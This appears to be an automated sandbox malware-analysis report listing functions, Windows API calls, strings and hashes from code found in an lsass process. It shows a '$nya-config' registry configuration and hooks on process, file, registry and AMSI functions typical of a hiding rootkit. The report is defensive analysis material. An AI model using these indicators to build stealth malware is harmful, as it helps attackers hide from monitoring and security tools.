Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 6a5a73e90e15d5065503e619210b3abc3386d86c0bf07523f252400ee6381c03
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: F771E736218F5986EB209F66F8906D933B4FF84B88F481211DE4D57B6ADE78C4C6C780

Function 0000017D2DD81724 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000017D2DD8172F
HeapAlloc.KERNEL32 ref: 0000017D2DD8173E

Part of subcall function 0000017D2DD81264: GetProcessHeap.KERNEL32 ref: 0000017D2DD8126A
Part of subcall function 0000017D2DD81264: HeapAlloc.KERNEL32 ref: 0000017D2DD81279
Part of subcall function 0000017D2DD81264: GetProcessHeap.KERNEL32 ref: 0000017D2DD81293
Part of subcall function 0000017D2DD81264: HeapAlloc.KERNEL32 ref: 0000017D2DD812A4

Part of subcall function 0000017D2DD81000: GetProcessHeap.KERNEL32 ref: 0000017D2DD81006
Part of subcall function 0000017D2DD81000: HeapAlloc.KERNEL32 ref: 0000017D2DD81015
Part of subcall function 0000017D2DD81000: GetProcessHeap.KERNEL32 ref: 0000017D2DD81028
Part of subcall function 0000017D2DD81000: HeapAlloc.KERNEL32 ref: 0000017D2DD81037

RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD817AE
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD817DB
RegCloseKey.ADVAPI32 ref: 0000017D2DD817F5
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD81815
RegCloseKey.ADVAPI32 ref: 0000017D2DD81830
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD81850
RegCloseKey.ADVAPI32 ref: 0000017D2DD8186B
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD8188B
RegCloseKey.ADVAPI32 ref: 0000017D2DD818A6
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD818C6
RegCloseKey.ADVAPI32 ref: 0000017D2DD818E1
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD81901
RegCloseKey.ADVAPI32 ref: 0000017D2DD8191C
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD8193C
RegCloseKey.ADVAPI32 ref: 0000017D2DD81957
RegOpenKeyExW.ADVAPI32 ref: 0000017D2DD81977
RegCloseKey.ADVAPI32 ref: 0000017D2DD81992
RegCloseKey.ADVAPI32 ref: 0000017D2DD8199C

Part of subcall function 0000017D2DD812B8: RegQueryInfoKeyW.ADVAPI32 ref: 0000017D2DD81315
Part of subcall function 0000017D2DD812B8: GetProcessHeap.KERNEL32 ref: 0000017D2DD81323
Part of subcall function 0000017D2DD812B8: HeapAlloc.KERNEL32 ref: 0000017D2DD81334
Part of subcall function 0000017D2DD812B8: RegEnumValueW.ADVAPI32 ref: 0000017D2DD81393
Part of subcall function 0000017D2DD812B8: GetProcessHeap.KERNEL32 ref: 0000017D2DD813DB
Part of subcall function 0000017D2DD812B8: HeapAlloc.KERNEL32 ref: 0000017D2DD813E9
Part of subcall function 0000017D2DD812B8: GetProcessHeap.KERNEL32 ref: 0000017D2DD81406
Part of subcall function 0000017D2DD812B8: HeapFree.KERNEL32 ref: 0000017D2DD81414
Part of subcall function 0000017D2DD812B8: lstrlenW.KERNEL32 ref: 0000017D2DD8141D
Part of subcall function 0000017D2DD812B8: GetProcessHeap.KERNEL32 ref: 0000017D2DD8142B
Part of subcall function 0000017D2DD812B8: HeapAlloc.KERNEL32 ref: 0000017D2DD81439

Strings

startup, xrefs: 0000017D2DD817D1
service_names, xrefs: 0000017D2DD818BF
udp, xrefs: 0000017D2DD81970
tcp_local, xrefs: 0000017D2DD818FA
process_names, xrefs: 0000017D2DD81849
pid, xrefs: 0000017D2DD8180E
tcp_remote, xrefs: 0000017D2DD81935
SOFTWARE\$nya-config, xrefs: 0000017D2DD8178E
paths, xrefs: 0000017D2DD81884

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$CloseOpenProcess$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\$nya-config$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 2135414181-3572789727
Opcode ID: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction ID: 65fb64354005f79140e98f5646543a48e81391d987071b53c93e696e4c4f1b1a
Opcode Fuzzy Hash: b9204f2ea4f4db16e4783a971f3715691613b435cf091f5c94434eae8088fe12
Instruction Fuzzy Hash: C3710636218F5886EB109F35F8917D923B4FF84B88F481221DA4D97B2ADF39C49AC340

Function 0000017D2DD81E74 Relevance: 43.8, APIs: 8, Strings: 17, Instructions: 95
memorythreadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentThread.KERNEL32 ref: 0000017D2DD81E7F

Part of subcall function 0000017D2DD822A8: GetModuleHandleA.KERNEL32(?,?,?,0000017D2DD81EB1), ref: 0000017D2DD822C0
Part of subcall function 0000017D2DD822A8: GetProcAddress.KERNEL32(?,?,?,0000017D2DD81EB1), ref: 0000017D2DD822D1

CreateThread.KERNEL32 ref: 0000017D2DD82043
TlsAlloc.KERNEL32 ref: 0000017D2DD82049
TlsAlloc.KERNEL32 ref: 0000017D2DD82055
TlsAlloc.KERNEL32 ref: 0000017D2DD82061
TlsAlloc.KERNEL32 ref: 0000017D2DD8206D
TlsAlloc.KERNEL32 ref: 0000017D2DD82079
TlsAlloc.KERNEL32 ref: 0000017D2DD82085

Strings

NtResumeThread, xrefs: 0000017D2DD81EC2
PdhGetFormattedCounterArrayW, xrefs: 0000017D2DD81FF1
NtQuerySystemInformation, xrefs: 0000017D2DD81EA5
sechost.dll, xrefs: 0000017D2DD81F99
EnumServicesStatusExW, xrefs: 0000017D2DD81F71, 0000017D2DD81F92
amsi.dll, xrefs: 0000017D2DD82019
NtDeviceIoControlFile, xrefs: 0000017D2DD81FB6
EnumServiceGroupW, xrefs: 0000017D2DD81F50
NtEnumerateValueKey, xrefs: 0000017D2DD81F36
AmsiScanBuffer, xrefs: 0000017D2DD82012
advapi32.dll, xrefs: 0000017D2DD81F57, 0000017D2DD81F78
NtEnumerateKey, xrefs: 0000017D2DD81F19
NtQueryDirectoryFile, xrefs: 0000017D2DD81EDF
ntdll.dll, xrefs: 0000017D2DD81E8D
pdh.dll, xrefs: 0000017D2DD81FD7, 0000017D2DD81FF8
PdhGetRawCounterArrayW, xrefs: 0000017D2DD81FD0
NtQueryDirectoryFileEx, xrefs: 0000017D2DD81EFC

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Alloc$Thread$AddressCreateCurrentHandleModuleProc
String ID: AmsiScanBuffer$EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$PdhGetFormattedCounterArrayW$PdhGetRawCounterArrayW$advapi32.dll$amsi.dll$ntdll.dll$pdh.dll$sechost.dll
API String ID: 1735320900-4225371247
Opcode ID: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction ID: 906870e1520e186d5afb4765476ade36e3d8b0bfe630996f3057a72254ecff36
Opcode Fuzzy Hash: 03b1670190296a985cca1de1054792f3360a7fe3fa664d1b18e69e842768ce50
Instruction Fuzzy Hash: 425167B451CF4EA5EA02EFA9FC41BD46B30AF40744F9C8962940D93567DE7986DBC380

Function 0000017D2DD512B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000017D2DD51315
GetProcessHeap.KERNEL32 ref: 0000017D2DD51323
HeapAlloc.KERNEL32 ref: 0000017D2DD51334
RegEnumValueW.ADVAPI32 ref: 0000017D2DD51393

Part of subcall function 0000017D2DD51530: StrCmpIW.SHLWAPI ref: 0000017D2DD51561

GetProcessHeap.KERNEL32 ref: 0000017D2DD513DB
HeapAlloc.KERNEL32 ref: 0000017D2DD513E9
GetProcessHeap.KERNEL32 ref: 0000017D2DD51406
HeapFree.KERNEL32 ref: 0000017D2DD51414
lstrlenW.KERNEL32 ref: 0000017D2DD5141D
GetProcessHeap.KERNEL32 ref: 0000017D2DD5142B
HeapAlloc.KERNEL32 ref: 0000017D2DD51439
StrCpyW.SHLWAPI ref: 0000017D2DD5145B
GetProcessHeap.KERNEL32 ref: 0000017D2DD51472
HeapFree.KERNEL32 ref: 0000017D2DD51480

Strings

d, xrefs: 0000017D2DD51356

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: c9bf57815c647d5cb5a2bf4a54b90c79dd327f0def2c695701b12de31f15661d
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 91512B32218B8896EB24CF62F44839A77B1FB88F98F484124DA4D07759DF7CC08A8780

Function 0000017D2DD812B8 Relevance: 26.4, APIs: 14, Strings: 1, Instructions: 120
memoryregistrystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegQueryInfoKeyW.ADVAPI32 ref: 0000017D2DD81315
GetProcessHeap.KERNEL32 ref: 0000017D2DD81323
HeapAlloc.KERNEL32 ref: 0000017D2DD81334
RegEnumValueW.ADVAPI32 ref: 0000017D2DD81393

Part of subcall function 0000017D2DD81530: StrCmpIW.SHLWAPI ref: 0000017D2DD81561

GetProcessHeap.KERNEL32 ref: 0000017D2DD813DB
HeapAlloc.KERNEL32 ref: 0000017D2DD813E9
GetProcessHeap.KERNEL32 ref: 0000017D2DD81406
HeapFree.KERNEL32 ref: 0000017D2DD81414
lstrlenW.KERNEL32 ref: 0000017D2DD8141D
GetProcessHeap.KERNEL32 ref: 0000017D2DD8142B
HeapAlloc.KERNEL32 ref: 0000017D2DD81439
StrCpyW.SHLWAPI ref: 0000017D2DD8145B
GetProcessHeap.KERNEL32 ref: 0000017D2DD81472
HeapFree.KERNEL32 ref: 0000017D2DD81480

Strings

d, xrefs: 0000017D2DD81356

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
String ID: d
API String ID: 2005889112-2564639436
Opcode ID: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction ID: 448656f4c821c33dcfb38d4f550e5ec9f8b87264af76efb82c3bb660e2ed0448
Opcode Fuzzy Hash: 09f32700ea8f2ab6ca5eb204845fa7f8e408035f576c0366055c572951769e92
Instruction Fuzzy Hash: 60512B32218B8896E725CF66F4583DA77B1FB88F98F584125DA4E47769DF39C08A8700

Function 0000017D2DD5EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000017D2DD5F34A,?,?,00000000,0000017D2DD5F2CD), ref: 0000017D2DD5EFF5
GetLastError.KERNEL32(?,?,00000000,0000017D2DD5F2CD), ref: 0000017D2DD5F007
LoadLibraryExW.KERNEL32(?,?,00000000,0000017D2DD5F2CD), ref: 0000017D2DD5F049
VirtualProtect.KERNEL32 ref: 0000017D2DD5F0A5
VirtualProtect.KERNEL32 ref: 0000017D2DD5F0D6
FreeLibrary.KERNEL32(?,?,00000000,0000017D2DD5F2CD), ref: 0000017D2DD5F11A
GetProcAddress.KERNEL32(?,?,00000000,0000017D2DD5F2CD), ref: 0000017D2DD5F126

Strings

api-ms-, xrefs: 0000017D2DD5F01B
ext-ms-, xrefs: 0000017D2DD5F02E
AppPolicyGetProcessTerminationMethod, xrefs: 0000017D2DD5F157, 0000017D2DD5F165

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 4972e08af1195b3f28e5aa5d2d33d3d318c4d8e495bad8b93d07054ccc4bb4d3
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: 39516C31749F4C51EA149B66B8407E922B0AF48BB0F5C07259E3D4B7D6EFB8D4878690

Function 0000017D2DD8EF88 Relevance: 17.6, APIs: 7, Strings: 3, Instructions: 140
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNEL32(?,00000100,00000000,0000017D2DD8F34A,?,?,00000000,0000017D2DD8F2CD), ref: 0000017D2DD8EFF5
GetLastError.KERNEL32(?,?,00000000,0000017D2DD8F2CD), ref: 0000017D2DD8F007
LoadLibraryExW.KERNEL32(?,?,00000000,0000017D2DD8F2CD), ref: 0000017D2DD8F049
VirtualProtect.KERNEL32 ref: 0000017D2DD8F0A5
VirtualProtect.KERNEL32 ref: 0000017D2DD8F0D6
FreeLibrary.KERNEL32(?,?,00000000,0000017D2DD8F2CD), ref: 0000017D2DD8F11A
GetProcAddress.KERNEL32(?,?,00000000,0000017D2DD8F2CD), ref: 0000017D2DD8F126

Strings

AppPolicyGetProcessTerminationMethod, xrefs: 0000017D2DD8F157, 0000017D2DD8F165
api-ms-, xrefs: 0000017D2DD8F01B
ext-ms-, xrefs: 0000017D2DD8F02E

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Library$LoadProtectVirtual$AddressErrorFreeLastProc
String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
API String ID: 740688525-1880043860
Opcode ID: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction ID: 4387cf98ae7e7cf881c486dddb7d8bf4973e6761fcd2057b11ff659195ec9fc8
Opcode Fuzzy Hash: 76271e0e5533c610f4bce9abf661b1e9c3d7f925dc4d85dc9c81cd2c8526c81c
Instruction Fuzzy Hash: A2518031749F4895EA169F66B8403E92270AF48BB0F6C0B259E3D877D6EF39D4878740

Function 0000017D2DD533A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000017D2DD533FD
GetProcessHeap.KERNEL32 ref: 0000017D2DD53412
HeapAlloc.KERNEL32 ref: 0000017D2DD53420
PdhGetCounterInfoW.PDH ref: 0000017D2DD53436
StrCmpW.SHLWAPI ref: 0000017D2DD5344B

Part of subcall function 0000017D2DD53950: StrCmpNW.SHLWAPI ref: 0000017D2DD53972
Part of subcall function 0000017D2DD53950: StrStrW.SHLWAPI ref: 0000017D2DD53990
Part of subcall function 0000017D2DD53950: StrToIntW.SHLWAPI ref: 0000017D2DD539B7

GetProcessHeap.KERNEL32 ref: 0000017D2DD53488
HeapFree.KERNEL32 ref: 0000017D2DD53496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000017D2DD53444

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: 422347752cb8a5a5f4ba61478ceba83143f2d89ceaa727bce76a7423e00b515b
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: FF317C32A08F4897E721DF52B804799A3B4BB98B95F484525DE8D43626DF78C4D78780

Function 0000017D2DD833A8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 74memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000017D2DD833FD
GetProcessHeap.KERNEL32 ref: 0000017D2DD83412
HeapAlloc.KERNEL32 ref: 0000017D2DD83420
PdhGetCounterInfoW.PDH ref: 0000017D2DD83436
StrCmpW.SHLWAPI ref: 0000017D2DD8344B

Part of subcall function 0000017D2DD83950: StrCmpNW.SHLWAPI ref: 0000017D2DD83972
Part of subcall function 0000017D2DD83950: StrStrW.SHLWAPI ref: 0000017D2DD83990
Part of subcall function 0000017D2DD83950: StrToIntW.SHLWAPI ref: 0000017D2DD839B7

GetProcessHeap.KERNEL32 ref: 0000017D2DD83488
HeapFree.KERNEL32 ref: 0000017D2DD83496

Strings

\GPU Engine(*)\Running Time, xrefs: 0000017D2DD83444

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Running Time
API String ID: 1943346504-1805530042
Opcode ID: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction ID: ced183f89da69b60b8a9272d777572d687372e3e94e18576f7d78a6321f913f2
Opcode Fuzzy Hash: 3c893031c2ac124323773ad806ea6b122c6292a63b4d30b410812c40362314f8
Instruction Fuzzy Hash: A5318E32A08F4897E722DF16B8047D9A3B4FB88B95F5C4625DE8D83626DF38C4978740

Function 0000017D2DD534B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000017D2DD53516
GetProcessHeap.KERNEL32 ref: 0000017D2DD53527
HeapAlloc.KERNEL32 ref: 0000017D2DD53535
PdhGetCounterInfoW.PDH ref: 0000017D2DD5354B
StrCmpW.SHLWAPI ref: 0000017D2DD53560

Part of subcall function 0000017D2DD53950: StrCmpNW.SHLWAPI ref: 0000017D2DD53972
Part of subcall function 0000017D2DD53950: StrStrW.SHLWAPI ref: 0000017D2DD53990
Part of subcall function 0000017D2DD53950: StrToIntW.SHLWAPI ref: 0000017D2DD539B7

GetProcessHeap.KERNEL32 ref: 0000017D2DD5358D
HeapFree.KERNEL32 ref: 0000017D2DD5359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000017D2DD53559

Memory Dump Source

Source File: 00000009.00000002.2816668849.0000017D2DD51000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD50000, based on PE: true

Associated: 00000009.00000002.2815675528.0000017D2DD50000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2817784234.0000017D2DD65000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2818711397.0000017D2DD70000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2819499827.0000017D2DD72000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2820277659.0000017D2DD79000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd50000_lsass.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: b2a5967eee084143195432e5f40e43866f6486d5eaa342772f780f2da15f402f
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: D0318C31618F498BEB10DF22B884799B3B0BF84F95F4851259E8E43766EE78D4C38680

Function 0000017D2DD834B8 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73memoryCOMMON

Download Yara Rule

APIs

PdhGetCounterInfoW.PDH ref: 0000017D2DD83516
GetProcessHeap.KERNEL32 ref: 0000017D2DD83527
HeapAlloc.KERNEL32 ref: 0000017D2DD83535
PdhGetCounterInfoW.PDH ref: 0000017D2DD8354B
StrCmpW.SHLWAPI ref: 0000017D2DD83560

Part of subcall function 0000017D2DD83950: StrCmpNW.SHLWAPI ref: 0000017D2DD83972
Part of subcall function 0000017D2DD83950: StrStrW.SHLWAPI ref: 0000017D2DD83990
Part of subcall function 0000017D2DD83950: StrToIntW.SHLWAPI ref: 0000017D2DD839B7

GetProcessHeap.KERNEL32 ref: 0000017D2DD8358D
HeapFree.KERNEL32 ref: 0000017D2DD8359B

Strings

\GPU Engine(*)\Utilization Percentage, xrefs: 0000017D2DD83559

Memory Dump Source

Source File: 00000009.00000002.2821913737.0000017D2DD81000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000017D2DD80000, based on PE: true

Associated: 00000009.00000002.2821164430.0000017D2DD80000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2822805609.0000017D2DD95000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2823553309.0000017D2DDA0000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824246909.0000017D2DDA2000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.2824895475.0000017D2DDA9000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_17d2dd80000_lsass.jbxd

Similarity

API ID: Heap$CounterInfoProcess$AllocFree
String ID: \GPU Engine(*)\Utilization Percentage
API String ID: 1943346504-3507739905
Opcode ID: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction ID: 839c9f9c300fb6fb3a88f4f7c443d2552f64df9f6c638fc59894e51bcba1eb08
Opcode Fuzzy Hash: 4dfb6054f5336d4a701c3ca7a3d18610e9584f8b2694925bec2ac2df63a9e25f
Instruction Fuzzy Hash: 0E314A31618F498BEB11DF22B88479A63B0BB84F94F5C45659E8E83766EE38D4878700

Function 0000017D2DD5A22C Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 310COMMON

Download Yara Rule

APIs

__FrameHandler3::GetHandlerSearchState.LIBVCRUNTIME ref: 0000017D2DD5A289

Part of subcall function 0000017D2DD5B144: __GetUnwindTryBlock.LIBCMT ref: 0000017D2DD5B187
Part of subcall function 0000017D2DD5B144: __SetUnwindTryBlock.LIBVCRUNTIME ref: 0000017D2DD5B1AC

Is_bad_exception_allowed.LIBVCRUNTIME ref: 0000017D2DD5A361
__FrameHandler3::ExecutionInCatch.LIBVCRUNTIME ref: 0000017D2DD5A5AF
std::bad_alloc::bad_alloc.LIBCMT ref: 0000017D2DD5A6BC

Strings

csm, xrefs: 0000017D2DD5A384
csm, xrefs: 0000017D2DD5A2A3
csm, xrefs: 0000017D2DD5A30A

Memory Dump Source

